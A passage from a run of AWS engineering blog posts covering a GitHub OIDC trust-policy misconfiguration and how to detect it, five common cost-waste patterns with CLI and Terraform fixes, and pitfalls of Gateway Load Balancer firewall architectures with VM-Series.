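# Two "StringEquals" keys in one object, as could happen in a hand-written policy.
raw = """
{
  "StringEquals": {"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"},
  "StringEquals": {"token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main"}
}
"""

condition = json.loads(raw)
# Python keeps the LAST duplicate, so the :aud check is gone without any warning.
print(list(condition["StringEquals"]))


def reject_duplicates(pairs):
    """object_pairs_hook that raises instead of silently overwriting keys."""
    keys = [key for key, _ in pairs]
    dupes = {key for key in keys if keys.count(key) > 1}
    if dupes:
        raise ValueError(f"duplicate keys: {sorted(dupes)}")
    return dict(pairs)


try:
    json.loads(raw, object_pairs_hook=reject_duplicates)
except ValueError as exc:
    print(exc)
```

Which duplicate wins depends on the parser. The point is that one of the two conditions disappears and nothing tells you.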

What AWS fixed (and what they didn't)

Back in June 2025, AWS introduced an additional security measure that blocks the creation of new roles without this condition. If you configure it incorrectly, it's an error.

Problem solved, right?

Not exactly. This security measure only applies to new roles. Pay attention to your OIDC roles created before June 2025. If you didn't fix them yourself, AWS didn't fix them for you either.

Did someone already exploit this?

If you use CloudTrail Lake, run this query to find any role assumptions from repos outside your organization:

SELECT eventTime, userIdentity.username AS github_subject,
       sourceIPAddress
FROM <your-event-data-store-id>
WHERE eventSource = 'sts.amazonaws.com'
  AND eventName = 'AssumeRoleWithWebIdentity'
  AND userIdentity.username NOT LIKE 'repo:YOUR-GITHUB-ORG/%'

If you see results - someone outside your org already used your role. Time to rotate credentials and check what they accessed.

One more thing

I'm currently working on additional functionality to detect this configuration in my AWS cloud-audit security scanner (it's completely open source). Any detection of this error will be included in a report, along with comments on how to fix it. If you'd like, please add a star to the repo; it will help me develop and encourage further work.

This year, I've audited dozens of accounts, and the ratio of vulnerable to secure is alarming - I bet most of you won't like the answer.

Sources: Datadog Security Labs, Google Cloud Threat Horizons H1 2026, AWS Security Blog, Wiz Blog

AWS Cost Waste: 5 Things I Find in Every Audit

Mariusz Gębala — Fri, 13 Mar 2026 22:08:57 +0000

AWS cost waste is money spent on cloud resources that deliver zero value - orphaned volumes, logs stored forever, idle databases, and infrastructure nobody remembers deploying. In most accounts, it adds up to 27-35% of the total bill.

#	Waste pattern	Typical annual cost	Fix effort
1	Orphaned EBS volumes	$2,000+ per TB	1 Terraform line
2	CloudWatch logs without retention	15% of monthly bill	1 CLI command per log group
3	Unnecessary NAT Gateways	$1,166/year per 3-AZ setup	Conditional Terraform
4	gp2 volumes instead of gp3	20% of EBS spend	In-place migration, zero downtime
5	Over-provisioned RDS	$350+/month per idle instance	Environment-aware sizing

According to a Flexera report, organizations waste 27% of their cloud spending. I have mixed feelings about this. In the audits I've conducted throughout my career, the result has more often been closer to 35%. Never mind the numbers. More important is the fact that almost no one notices wasted money until they actually check it.

Interestingly, these aren't some exotic edge cases. The same pattern usually repeats itself - five similar problems for every customer. In this article, I present a list of the most common cases.

1. Orphaned EBS volumes

Did you have EC2 for testing? Great. Did you test everything you needed to? Even better. Did you terminate the instances? Well, you're clearly a professional who cares about costs. But wait... Did you really tick "Delete on termination" for the EBS volumes? Oh, no? And you've probably tested hundreds of instances over the last year? Let's be optimistic and say you had 50 of these instances. The cost is 0.08-0.10 USD per GB per month. Let's not bother with the math; I'll leave that to you.

One audit turned up 2.4 TB of orphaned volumes across three regions. About $2.3k a year just went "into the cloud" and nobody noticed. But who's going to stop a rich man?
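
The math is short enough to script. Below is a minimal sketch, assuming the $0.08 per GB-month price quoted above and counting 1 TB as 1,000 GB; the function name is made up for illustration.

```python
def orphaned_volume_cost(total_gb: float, price_per_gb_month: float = 0.08) -> dict:
    """Monthly and annual cost of unattached EBS volumes at a flat per-GB price."""
    monthly = total_gb * price_per_gb_month
    return {"monthly_usd": round(monthly, 2), "annual_usd": round(monthly * 12, 2)}


# The audit example: 2.4 TB of orphaned volumes, counted as 2,400 GB.
audit = orphaned_volume_cost(2400)
print(audit)  # annual_usd comes out at 2304.0
```

For the 50 forgotten test instances, plug in your own root volume size. With a hypothetical 100 GB each, `orphaned_volume_cost(50 * 100)` gives $400 a month.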

Find them:

aws ec2 describe-volumes \
  --filters Name=status,Values=available \
  --query 'Volumes[].{ID:VolumeId,Size:Size,Type:VolumeType,Created:CreateTime}' \
  --output table

If that table has more than zero rows, you're paying for storage nobody uses.

Prevent with Terraform:

resource "aws_instance" "app" {
  ami           = var.ami_id
  instance_type = var.instance_type

  root_block_device {
    volume_type           = "gp3"
    delete_on_termination = true  # This is the line that matters
    encrypted             = true
  }
}

One line in your module. That's it. If your Terraform modules don't set this, every terminated instance leaves behind a volume that nobody will ever clean up.

2. CloudWatch logs that never expire

We like having application logs, don't we? Let's log everything: Lambda, all ECS tasks, every API Gateway - EVERYTHING! Retention? And what if, in 15 years, someone asks why that ECS task crashed? Don't set it.

Logs are just text, and it's hard to disagree. Logging everything to CloudWatch isn't the problem either. The problem is keeping those logs without any retention. Honestly, how often do you read logs older than a few days? Logs from a month ago might be useful once every five years, and you would survive without them. But even if you never look at them, you pay for storing all of them. It looks like peanuts at $0.03 per GB per month, but it adds up faster than you think. I've seen accounts where CloudWatch was 15% of the monthly bill.

The conclusion is simple: if you let AWS create log groups automatically (which is the default behavior), retention is infinite. Using Terraform? Then set a retention policy there and you won't have to worry about unusually high bills.
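
To see how "peanuts" turn into a real line item, here is a rough sketch of the storage charge with and without retention. It assumes the $0.03 per GB-month price from above and a hypothetical 500 GB of new logs per month, and it ignores ingestion charges and compression, so treat the output as an order of magnitude only.

```python
def storage_bill_by_month(ingest_gb_per_month: float, months: int,
                          price_per_gb_month: float = 0.03) -> list[float]:
    """Monthly storage charge when nothing ever expires: stored data grows linearly."""
    return [round(ingest_gb_per_month * m * price_per_gb_month, 2)
            for m in range(1, months + 1)]


def capped_storage_bill(ingest_gb_per_month: float, retention_days: int,
                        price_per_gb_month: float = 0.03) -> float:
    """Steady-state monthly storage charge once a retention policy is in place."""
    stored_gb = ingest_gb_per_month * retention_days / 30
    return round(stored_gb * price_per_gb_month, 2)


bills = storage_bill_by_month(500, 36)   # hypothetical ingest rate, 3 years
print(bills[0], bills[11], bills[35])    # month 1, month 12, month 36
print(capped_storage_bill(500, 30))      # same ingest with 30-day retention
```

Without retention the monthly charge keeps climbing every month. With 30-day retention it stays flat at the month-one level.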

Find log groups with no retention:

aws logs describe-log-groups \
  --query 'logGroups[?!retentionInDays].{Name:logGroupName,StoredBytes:storedBytes}' \
  --output table

Fix immediately:

# Set 30-day retention on a specific log group
aws logs put-retention-policy \
  --log-group-name "/aws/lambda/my-function" \
  --retention-in-days 30

Prevent with Terraform:

# Create the log group BEFORE the Lambda, so you control retention
resource "aws_cloudwatch_log_group" "lambda" {
  name              = "/aws/lambda/${var.function_name}"
  retention_in_days = 30  # ALWAYS set this
}

3. NAT Gateways nobody needs

Oh, I love this topic. You probably already know that overlay routing helps reduce the already high costs of implementing VM-Series. Just creating a NAT Gateway costs ~33 USD a month before a single bit has passed through it. Now imagine you need HA, so you run one NAT Gateway in each AZ, three in total. That's about 100 USD a month just for having them. On top of that, you pay 0.045 USD per GB processed.

You know the problem? Most non-production environments seriously don't need three NAT Gateways. In fact, sometimes they don't need one at all.
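
Here is the arithmetic behind those numbers as a small sketch. The $0.045 hourly price and the 720-hour month are my assumptions (they reproduce the ~33 USD figure above); the per-GB price is the one quoted in the text.

```python
HOURLY_USD = 0.045       # assumption: hourly price per NAT Gateway
PER_GB_USD = 0.045       # data processing price quoted above
HOURS_PER_MONTH = 720    # assumption: 30-day month


def nat_monthly_cost(gateways: int, processed_gb: float = 0.0) -> float:
    """Fixed hourly charge for all gateways plus per-GB data processing."""
    fixed = gateways * HOURLY_USD * HOURS_PER_MONTH
    return round(fixed + processed_gb * PER_GB_USD, 2)


print(nat_monthly_cost(1))                    # one idle gateway
print(nat_monthly_cost(3))                    # idle 3-AZ setup
print(round(nat_monthly_cost(3) * 12, 2))     # same setup over a year
```

The yearly figure for the idle 3-AZ setup lands on the $1,166 from the table at the top, and that is before any traffic.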

Check utilization:

# Check bytes processed by each NAT Gateway over the last 7 days
aws cloudwatch get-metric-statistics \
  --namespace AWS/NATGateway \
  --metric-name BytesOutToDestination \
  --dimensions Name=NatGatewayId,Value=nat-0123456789abcdef0 \
  --start-time $(date -u -d '7 days ago' +%Y-%m-%dT%H:%M:%S) \
  --end-time $(date -u +%Y-%m-%dT%H:%M:%S) \
  --period 604800 \
  --statistics Sum

Prevent with Terraform:

variable "environment" {
  type = string
}

# 1 NAT Gateway in dev/staging, N in production
resource "aws_nat_gateway" "main" {
  count         = var.environment == "prod" ? length(var.azs) : 1
  allocation_id = aws_eip.nat[count.index].id
  subnet_id     = aws_subnet.public[count.index].id
}

It's also worth checking whether your private subnets need internet access at all. Maybe some of them only talk to other AWS services? VPC endpoints are often a cheaper solution than NAT Gateways, and gateway endpoints for S3 and DynamoDB carry no hourly charge at all.

4. gp2 volumes that should be gp3

This one is interesting too. The fix takes almost no effort, yet I see the problem practically everywhere.

I can guess where it comes from. Common wisdom says newer means more expensive, and a higher version number looks newer. So someone who doesn't use AWS every day launches an EC2 instance, sees the choice between gp2 and gp3, and thinks, "I'll go with the older, cheaper one." Mmm... good luck! gp3 is about 20% cheaper per GB than gp2 and comes with a baseline of 3,000 IOPS and 125 MB/s throughput regardless of volume size. Despite this, according to Datadog's State of Cloud Costs report, gp2 accounts for 58% of EBS spending.

In almost every scenario gp3 simply costs less and performs at least as well. The one thing to check before migrating: gp2 baseline IOPS grow with size (3 IOPS per GB), so a gp2 volume larger than 1 TB may already have more than gp3's default 3,000 IOPS. For those volumes, provision the extra IOPS and throughput on gp3 explicitly.
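
If you want a quick per-volume check before migrating in bulk, something like the sketch below works. The per-GB prices are assumed list prices ($0.10 for gp2, $0.08 for gp3; check your region), and the gp2 baseline formula (3 IOPS per GB, floor 100, cap 16,000) is the documented gp2 behavior. The function names are made up.

```python
GP2_USD_PER_GB = 0.10    # assumption: list price per GB-month
GP3_USD_PER_GB = 0.08    # assumption: list price per GB-month
GP3_BASE_IOPS = 3000     # gp3 baseline, independent of size


def gp2_baseline_iops(size_gb: int) -> int:
    """gp2 baseline scales at 3 IOPS per GB, with a floor of 100 and a cap of 16,000."""
    return max(100, min(16000, 3 * size_gb))


def compare(size_gb: int) -> dict:
    """Storage saving from moving to gp3, and whether extra gp3 IOPS are needed."""
    gp2_iops = gp2_baseline_iops(size_gb)
    return {
        "monthly_saving_usd": round(size_gb * (GP2_USD_PER_GB - GP3_USD_PER_GB), 2),
        "gp2_baseline_iops": gp2_iops,
        "needs_extra_gp3_iops": gp2_iops > GP3_BASE_IOPS,
    }


print(compare(500))     # typical volume: cheaper and faster on gp3 as-is
print(compare(2000))    # large volume: provision extra IOPS when migrating
```

Volumes flagged with `needs_extra_gp3_iops` are the ones where a blind switch to gp3 defaults could lower baseline performance, so set IOPS explicitly for those.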

Find all gp2 volumes:

aws ec2 describe-volumes \
  --filters Name=volume-type,Values=gp2 \
  --query 'Volumes[].{ID:VolumeId,Size:Size,State:State,Instance:Attachments[0].InstanceId}' \
  --output table

Migrate (no downtime):

aws ec2 modify-volume --volume-id vol-0123456789abcdef0 --volume-type gp3

That's it. No shutdowns, no snapshots, no maintenance window. The migration occurs in the background while the volume remains connected and operational.

Prevent with Terraform:

variable "volume_type" {
  type    = string
  default = "gp3"

  validation {
    condition     = var.volume_type != "gp2"
    error_message = "Use gp3 instead of gp2. It's 20% cheaper with better baseline performance."
  }
}

A validation block in the EC2 module rejects gp2 at plan time. This prevents anyone from accidentally deploying a costly option.

5. Over-provisioned RDS instances

Time for dessert. Oh, how many companies lose real money here. Let me give you an example. Something is going to launch in production in eight months, so the development environment gets exactly the same parameters production will have. Take a db.r6g.xlarge instance. Cost? Let's say $350 a month on average. Needed for development? Yes, the same as a bicycle for a fish.

But this is still a rare case. In production, I've seen more than once someone set up RDS where the average CPU utilization is 5-8%. The last time such a move was in 2008, when the global crisis hit everyone.

Check CPU utilization over the last 14 days:

aws cloudwatch get-metric-statistics \
  --namespace AWS/RDS \
  --metric-name CPUUtilization \
  --dimensions Name=DBInstanceIdentifier,Value=my-database \
  --start-time $(date -u -d '14 days ago' +%Y-%m-%dT%H:%M:%S) \
  --end-time $(date -u +%Y-%m-%dT%H:%M:%S) \
  --period 86400 \
  --statistics Average \
  --output table

Check for zero-connection databases:

aws cloudwatch get-metric-statistics \
  --namespace AWS/RDS \
  --metric-name DatabaseConnections \
  --dimensions Name=DBInstanceIdentifier,Value=my-database \
  --start-time $(date -u -d '7 days ago' +%Y-%m-%dT%H:%M:%S) \
  --end-time $(date -u +%Y-%m-%dT%H:%M:%S) \
  --period 3600 \
  --statistics Maximum \
  --output table

Prevent with Terraform:

resource "aws_db_instance" "main" {
  instance_class    = var.environment == "prod" ? "db.r6g.large" : "db.t4g.micro"
  multi_az          = var.environment == "prod"
  allocated_storage = var.environment == "prod" ? 100 : 20
  storage_type      = "gp3"
}

Environment-aware sizing. Dev gets the minimum, production gets what it needs. No more copying production configs into staging and forgetting about it.

The pattern behind all five

You've probably noticed a key problem? Most of these topics don't apply to startups or small businesses that watch every cent twice. They apply to large companies. You know what's worse? That these large companies often look for savings on staffing in difficult times, not even on the things I mentioned. Nobody seems to pay attention to that. You know why? Because the staff has shrunk...

And it's not like I see this everywhere. The teams I work with usually know AWS really well. There's simply a real shortage of people and time to devote to cloud cost optimization.

What to do about it

Simply take these ready-made commands and run them on your environment. It'll take you maybe 10 minutes, and you might save someone or yourself a full-time job.

If you want to go deeper into the topic - identify over-provisioned compute, audit data transfer patterns, check commitment coverage (Savings Plans, Reserved Instances) - that's a longer conversation. But start with these five. They can be checked for free, and most can be fixed for free.

I built cloud-audit to automate the security side of these checks - it runs 30+ checks in ~12 seconds. For cost specifically, the five CLI commands above are your starting point.

Originally published at haitmg.pl

GWLB in Production: 9 Pitfalls That Break Your Firewall Architecture

Mariusz Gębala — Tue, 10 Mar 2026 13:30:22 +0000

As a Cloud Engineer, I have often implemented solutions that improve network and application security in clients' infrastructures. One of the most common choices was Palo Alto VM-Series firewalls, which are built for public clouds. Implementing VM-Series, however, isn't as straightforward as it sounds in theory. To get a truly functional infrastructure, many other resources must be deployed around the firewalls themselves. Take AWS, for example. One of the most popular approaches is to use a Gateway Load Balancer (in fact, this is one of the reasons this type of load balancer was introduced at AWS). Choosing GWLB brings further dependencies, such as Gateway Load Balancer Endpoints, which should sit in dedicated subnets, so the routing tables in each of these subnets must be set up correctly as well. Ultimately, it turns out that it's best to encapsulate the security portion of the infrastructure in a dedicated VPC. But since this is a separate VPC, it has to be connected to the other VPCs somehow so that their traffic is actually filtered and inspected by the firewalls. This is where Transit Gateway comes in.

As you can see, simply gathering dependencies is no easy task, let alone configuring them. In this article, I'd like to focus on a few key aspects that can save you time if you choose this architecture. I've implemented this solution numerous times for clients across various industries. As I walk through the configuration process, I'll describe some not-so-typical issues, but ones that might give you a few extra gray hairs.

The architecture

Before diving into the pitfalls, here's the centralized inspection architecture this article is about:

[Diagram: centralized inspection architecture with route table details]

1. Asymmetric traffic forwarding without TGW Appliance Mode

We're considering a scenario where we implement our solution in a centralized architecture. The Transit Gateway is responsible for sending traffic between VPCs. Now let's imagine this situation (let's trace the packet flow together).

A virtual machine (let's call it app_vm) in Spoke VPC attempts to send a packet to a second virtual machine in another Spoke VPC (let's call it db_vm). app_vm is located in AZ A, db_vm is located in AZ B. Here's what happens:

app_vm initiates a connection. It checks the routing table in its subnet, which states that every packet destined for the 172.16.0.0/16 subnet is sent to the Transit Gateway.
Transit Gateway receives the packet from the VPC where app_vm is located. It checks the routing table associated with that VPC. The routing table clearly states: send this packet to Security VPC.
Transit Gateway forwards the packet to Security VPC. And here's a very important point that will have consequences later. Due to AZ affinity (TGW's default behavior - it sends traffic to the same AZ the packet originated from), the packet is sent to the Transit Gateway Attachment subnet in AZ A.
The Transit Gateway Attachment subnet in AZ A receives the packet and forwards it to the Gateway Load Balancer Endpoint, also in AZ A.
The packet reaches the Gateway Load Balancer and is then forwarded to the VM-Series in AZ A.
Policies configured on the firewall allow the packet to pass through, so the packet is sent to the Gateway Load Balancer Endpoint subnet (AZ A) and then to the Transit Gateway.
The Transit Gateway receives the packet from the Security VPC and forwards it based on the routing table to the Spoke VPC where db_vm is located. The packet reaches the destination machine.

Sounds good, right? Now let's trace the return traffic.

db_vm responds to the request received from app_vm. It checks the routing table in its subnet, which says that a packet destined for 192.168.0.0/24 should be sent to the Transit Gateway. It does so.
The Transit Gateway receives this packet, checks the routing table, and forwards it to the Security VPC.
This is the key moment. Due to the same AZ affinity mechanism, the Transit Gateway sends this packet to the Transit Gateway Attachment subnet in AZ B - because db_vm is in AZ B. This is not random - TGW deterministically picks the AZ based on where the packet entered.
The packet is forwarded to the Gateway Load Balancer Endpoint in the subnet in AZ B. The packet is then forwarded to the Gateway Load Balancer, which forwards it to the VM-Series in AZ B.
The VM-Series in AZ B receives the packet and thinks, "What is this? I have no idea what this session is about."
DROP.

Fortunately, solving this problem is incredibly simple (but only if you understand the problem). In the Transit Gateway VPC attachment configuration, simply enable the Appliance Mode option. This changes TGW's forwarding logic from AZ affinity to a flow hash based on the 4-tuple (source IP, destination IP, source port, destination port) - ensuring both directions of a flow are always delivered to the same AZ in the Security VPC. This option is not enabled by default.
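
To make the difference concrete, here is a toy model of a direction-independent flow hash. This is not AWS's actual algorithm (which isn't public in this detail); it only illustrates why hashing the 4-tuple symmetrically sends both directions of a flow to the same AZ. The IPs, ports, and AZ labels are made-up examples matching the walkthrough above.

```python
import hashlib


def pick_az(src_ip: str, dst_ip: str, src_port: int, dst_port: int,
            azs: list[str]) -> str:
    """Pick an AZ from a direction-independent hash of the flow's 4-tuple."""
    # Sort the two endpoints so A->B and B->A produce the same hash key.
    endpoints = sorted([(src_ip, src_port), (dst_ip, dst_port)])
    digest = hashlib.sha256(repr(endpoints).encode()).digest()
    return azs[int.from_bytes(digest[:8], "big") % len(azs)]


azs = ["az-a", "az-b"]
# app_vm (AZ A) -> db_vm (AZ B), and the reply in the opposite direction.
request_az = pick_az("192.168.0.10", "172.16.0.20", 49152, 5432, azs)
reply_az = pick_az("172.16.0.20", "192.168.0.10", 5432, 49152, azs)
print(request_az == reply_az)  # both directions land in the same AZ
```

With AZ affinity, the choice depends on where the packet entered, so request and reply can end up at different firewalls. With a symmetric hash, the choice depends only on the flow itself.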

Sources: AWS Docs: Transit Gateway Appliance Mode, AWS Prescriptive Guidance: Transit Gateway asymmetric routing

2. Fail-open when all targets are unhealthy

Imagine an extremely rare, but still possible, situation. All the firewalls in all AZs of your Security VPC become inoperable for some reason. The Target Group associated with GWLB sees them all as unhealthy. What comes to mind first? That GWLB will drop traffic rather than forward it to unhealthy instances. This seems logical, but unfortunately it's not true.

GWLB will go into fail-open mode. What does this mean for you? It depends. If the firewall has crashed or been terminated, the traffic will indeed stop at the firewall and be dropped. However, if the firewall is up but failing health checks (e.g., due to a CPU spike, a license expiry, or a bad Panorama push), it can pass this traffic through without inspection. This is a real security bypass.

How can you protect against this? There are several options.

Configuring alerts on CloudWatch for UnHealthyHostCount is a must - so you're at least aware that there might be a threat.
Configuring target_failover.on_unhealthy to rebalance will rehash flows to healthy targets. Note that this helps when some targets are unhealthy - if all targets are down, there's nowhere to rebalance to.
A great, though slightly more advanced, solution is to use a Lambda-based kill switch. If such a situation occurs, the function should modify the routing tables to blackhole traffic.
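
A rough sketch of what the core of such a kill switch could look like in Python. It is written against boto3-style `elbv2` and `ec2` clients passed in as arguments (in a Lambda you would create them with `boto3.client(...)`). I'm assuming the blackhole goes into a Transit Gateway route table and that a static route for each CIDR already exists there. Function names and the choice of route table are my assumptions, and restoring the routes afterwards is deliberately left out.

```python
def all_targets_unhealthy(elbv2, target_group_arn: str) -> bool:
    """True when the target group has targets and none of them is healthy."""
    resp = elbv2.describe_target_health(TargetGroupArn=target_group_arn)
    states = [d["TargetHealth"]["State"] for d in resp["TargetHealthDescriptions"]]
    return bool(states) and all(state != "healthy" for state in states)


def kill_switch(elbv2, ec2, target_group_arn: str, tgw_route_table_id: str,
                cidrs: list[str]) -> bool:
    """Blackhole the given CIDRs in a TGW route table if no firewall is healthy."""
    if not all_targets_unhealthy(elbv2, target_group_arn):
        return False
    for cidr in cidrs:
        # Assumption: a static route for this CIDR already exists in the table.
        ec2.replace_transit_gateway_route(
            DestinationCidrBlock=cidr,
            TransitGatewayRouteTableId=tgw_route_table_id,
            Blackhole=True,
        )
    return True
```

Note that this treats every non-healthy state (including `initial` during registration) as a failure, which is the conservative choice. Test it in a lab before wiring it to an alarm, because a false positive here cuts traffic on purpose.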

Sources: AWS Docs: Health checks for GWLB target groups, AWS Whitepaper: GWLB with TGW for centralized security

3. The real cost stack

It's generally accepted that the price for GWLB is around $0.014 per hour per AZ. Well, that's true, but that's just GWLB. The table lists all the ACTUAL costs:

Component	Cost basis	Monthly cost (3 AZs, 2 FW/AZ, 1 TB/mo)
GWLB hourly	$0.014/AZ-hour	$31
GWLB usage (GLCU)	$0.004/GLCU-hour	~$50
GWLBE hourly (PrivateLink)	$0.011/hour per endpoint	$24
GWLBE data processing	$0.01/GB	$10
Cross-AZ data transfer	$0.01/GB each direction	$20
TGW attachment	$0.07/hour per attachment	$153
TGW data processing	$0.02/GB	$20
EC2 instances (6x c5n.xlarge)	~$0.34/h per instance	$1,489
Subtotal (infra only)		~$1,797/mo
VM-Series PAYG license	$1.71/h per instance	$7,490
Total with PAYG		~$9,287/mo
VM-Series BYOL license (amortized)	varies	~$2,400-3,600
Total with BYOL		~$4,197-5,397/mo
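
If you want to rerun the table with your own numbers, the sketch below reproduces it. The unit prices are the ones from the table. The 730-hour month and the three TGW attachments are my assumptions, chosen because they reproduce the table's figures, and the GLCU line is taken as the table's flat ~$50 estimate.

```python
HOURS = 730          # assumption: hours per month
AZS = 3
FIREWALLS = 6        # 2 per AZ
TRAFFIC_GB = 1000    # 1 TB per month

infra = {
    "GWLB hourly":            0.014 * AZS * HOURS,
    "GWLB usage (GLCU)":      50.0,                    # estimate taken from the table
    "GWLBE hourly":           0.011 * AZS * HOURS,
    "GWLBE data processing":  0.01 * TRAFFIC_GB,
    "Cross-AZ data transfer": 0.01 * 2 * TRAFFIC_GB,   # both directions
    "TGW attachment":         0.07 * 3 * HOURS,        # assumption: 3 attachments
    "TGW data processing":    0.02 * TRAFFIC_GB,
    "EC2 instances":          0.34 * FIREWALLS * HOURS,
}

rounded = {name: round(cost) for name, cost in infra.items()}
subtotal = sum(rounded.values())
payg = round(1.71 * FIREWALLS * HOURS)

for name, cost in rounded.items():
    print(f"{name:<24} ${cost:>6,}")
print(f"{'Subtotal (infra only)':<24} ${subtotal:>6,}")
print(f"{'Total with PAYG':<24} ${subtotal + payg:>6,}")
print(f"{'Total with BYOL':<24} ${subtotal + 2400:,}-{subtotal + 3600:,}")
```

Change `AZS`, `FIREWALLS`, or `TRAFFIC_GB` and the license line stays the dominant cost in most realistic setups.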

As you can see, your monthly invoice doesn't include just the GWLB itself. You budgeted around $500, and at the end of the month, you receive an invoice for ~$9,000 (depending on the region). Consider an alternative - perhaps a native AWS firewall will suffice for your needs, costing around $750 per month. (But of course, this also cuts out many features - I described this in more detail in this article.)

And another "pleasant" surprise: if you configure cross-zone load balancing on GWLB, remember that you pay $0.01/GB for each cross-AZ hop. This option is worth considering when planning your HA architecture.

Sources: AWS ELB Pricing, AWS PrivateLink Pricing

4. Palo Alto overlay routing - not a silver bullet

Overlay Routing in VM-Series can be a great solution. We don't need to create separate NAT Gateways native to AWS; traffic to the internet exits directly through the firewall's public interface. And that's all great, but this configuration will only work for outbound traffic.

What about inbound traffic? The firewall will inspect the packet, apply overlay routing, and instead of returning the packet back through the GWLB endpoint, it will send it out through its public interface. The result - asymmetric routing and dropped connections.

East-west traffic (VPC-to-VPC) in a centralized TGW architecture is a different story - it actually works fine with overlay routing. The packets have private destination IPs, so the firewall's L3 lookup routes them back via the GENEVE interface, not out the public interface.

But there are solutions for combined traffic too.

First and foremost, consider whether you really need overlay routing. If it's only going to inspect outbound traffic, then yes, it's a shame not to take advantage of this option.

If you need inbound traffic handling but don't want to give up overlay routing, don't worry. You'll need to spend a bit more time on configuring subinterfaces and virtual routers, but it can be done while maintaining full functionality.

One more thing worth mentioning - there was a confirmed bug (PAN-229985, fixed in PAN-OS 11.1.3) where GWLB overlay routing packets were re-encapsulated with an incorrect flow cookie in the GENEVE header. Some of the issues reported on LIVEcommunity may have been caused by this bug rather than an architectural limitation. Make sure you're running a version with this fix.

Finally, before you decide to deploy this solution to production, test it in a test environment.

Sources: Palo Alto: Enable Overlay Routing for VM-Series on AWS, LIVEcommunity: Overlay Routing with GWLB for Combined Model (SOLVED), LIVEcommunity: Issues with Overlay Routing and GWLB

5. PAN-OS version roulette

Remember - there's no operating system in the world that's bug-free. PAN-OS is no exception. Some versions of PAN-OS have problems coexisting with GWLB, particularly when overlay routing is enabled:

PAN-OS Version	GWLB Status
10.1.5-h5	Working
10.1.6	Broken (fix in 10.1.6-h6)
10.1.7	Working
10.2.2	Broken
10.2.3-h2	Issues reported
11.0.0 (EOL)	Issues reported

We usually assume that the newer version will be better than the previous one. We decide to upgrade (because who would test anyway...). Well, we updated our version to the latest one and... something's not right. Gateway Load Balancer Endpoints don't work, but they don't show any errors either.

The solution is brutally simple, but many users seem to forget this. TEST the new PAN-OS version in a non-production environment. Don't go straight to production with untested software. When you buy new running shoes, do you immediately wear them in the most important race of your life, or do you test them during training sessions to make sure they really suit you?

Sources: LIVEcommunity: Overlay Routing + GWLB issues, LIVEcommunity: GWLB VPC Endpoint broken post-upgrade

6. NAT on the firewall breaks traffic

Are you an administrator managing firewalls at your on-prem location and have been tasked with deploying VM-Series in the cloud? I'd bet your intuition (and probably rightly so) tells you that one of the most important configurations will be the correct NAT settings on the firewalls. You apply the same pattern to the Cloud Firewall with GWLB and... it doesn't work? No wonder.

GWLB validates the 5-tuple of return packets against its connection state table. If you've set up DNAT on the firewall, the 5-tuple no longer matches, so GWLB drops the packet. And it doesn't make things easy for you: you won't get a clear error, and the logs won't tell you either.
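
A toy model of that check, just to show the mechanics. This is a simplification I wrote for illustration, not how GWLB is implemented internally. The class and method names are hypothetical, and the addresses are made up.

```python
from typing import NamedTuple


class FiveTuple(NamedTuple):
    proto: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


class FlowTable:
    """Remembers every flow handed to a firewall and checks what comes back."""

    def __init__(self) -> None:
        self._flows: set[FiveTuple] = set()

    def send_to_firewall(self, pkt: FiveTuple) -> FiveTuple:
        self._flows.add(pkt)
        return pkt

    def accept_from_firewall(self, pkt: FiveTuple) -> bool:
        # A packet is only accepted if its 5-tuple matches a known flow.
        return pkt in self._flows


table = FlowTable()
original = table.send_to_firewall(FiveTuple("tcp", "203.0.113.7", 51000, "10.0.1.10", 443))

untouched = original                              # firewall inspects, changes nothing
dnatted = original._replace(dst_ip="10.0.5.20")   # firewall rewrites the destination

print(table.accept_from_firewall(untouched))   # accepted
print(table.accept_from_firewall(dnatted))     # dropped, silently
```

The second packet is perfectly valid from the firewall's point of view, which is why the drop is so confusing when you debug it from the PAN-OS side only.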

When using GWLB, you don't need to NAT on the VM-Series. If you carefully examine the architecture (the one at the beginning of the article), you'll notice that using a NAT Gateway is enough to handle outbound traffic. Unless you're using overlay routing (see section 4), in which case the firewall handles outbound NAT directly.

Sources: AWS re:Post: NAT on Palo FW with GWLB, AWS Best practices for GWLB

7. The debugging nightmare

Gateway Load Balancer is a brilliant AWS solution... but not for debugging traffic problems.

Put simply, even default VPC Flow Logs won't help here. The problem is that GWLB encapsulates traffic with the GENEVE protocol on UDP port 6081. Instead of the actual source and destination addresses, you'll see some private addressing that tells you nothing.

Make one mistake in any routing table and you're in... a black hole. Look at the architecture diagram to see how many routing tables appear in the VPC itself (and add the corresponding routing tables in TGW, in the Spoke VPCs). You have to be careful, and honestly, I don't have a silver bullet.

What can help?

Flow Logs on Gateway Load Balancer Endpoint interface with custom fields: ${pkt-srcaddr}, ${pkt-dstaddr}, ${flow-direction}, ${tcp-flags}
Logs directly on VM-Series
AWS Reachability Analyzer
Simultaneous tcpdump on client, server, and firewall interfaces
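
For the first item, a small parser makes those custom-format records easier to read. This sketch assumes the log format contains exactly the four fields listed above, in that order, separated by spaces. The sample record is made up, and the flag values (FIN 1, SYN 2, RST 4, ACK 16) are the standard TCP bit values that flow logs report as a bitmask.

```python
FIELDS = ["pkt-srcaddr", "pkt-dstaddr", "flow-direction", "tcp-flags"]
TCP_FLAGS = {1: "FIN", 2: "SYN", 4: "RST", 16: "ACK"}


def parse_record(line: str) -> dict:
    """Turn one space-separated flow log record into a dict with decoded TCP flags."""
    values = line.split()
    if len(values) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(values)}")
    record = dict(zip(FIELDS, values))
    raw_flags = record["tcp-flags"]
    if raw_flags == "-":                 # non-TCP traffic or no data
        record["tcp-flags"] = []
    else:
        mask = int(raw_flags)
        record["tcp-flags"] = [name for bit, name in TCP_FLAGS.items() if mask & bit]
    return record


sample = "192.168.0.10 172.16.0.20 ingress 2"   # made-up record: a SYN from app_vm
print(parse_record(sample))
```

Seeing a SYN on ingress with no matching SYN-ACK on the way back is usually the first hint that a route table or the firewall itself is eating the flow.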

8. One Security VPC or two?

If you need to inspect both east-west (VPC-to-VPC) and north-south (internet ingress/egress) traffic, you might wonder whether one Security VPC is enough.

The good news - a single Security VPC with Appliance Mode ON works for both traffic types. North-south traffic is not broken by Appliance Mode. For internet-bound traffic (where the destination has no AZ), TGW with Appliance Mode selects the ENI in the source AZ anyway - so it behaves almost identically to the default AZ affinity.

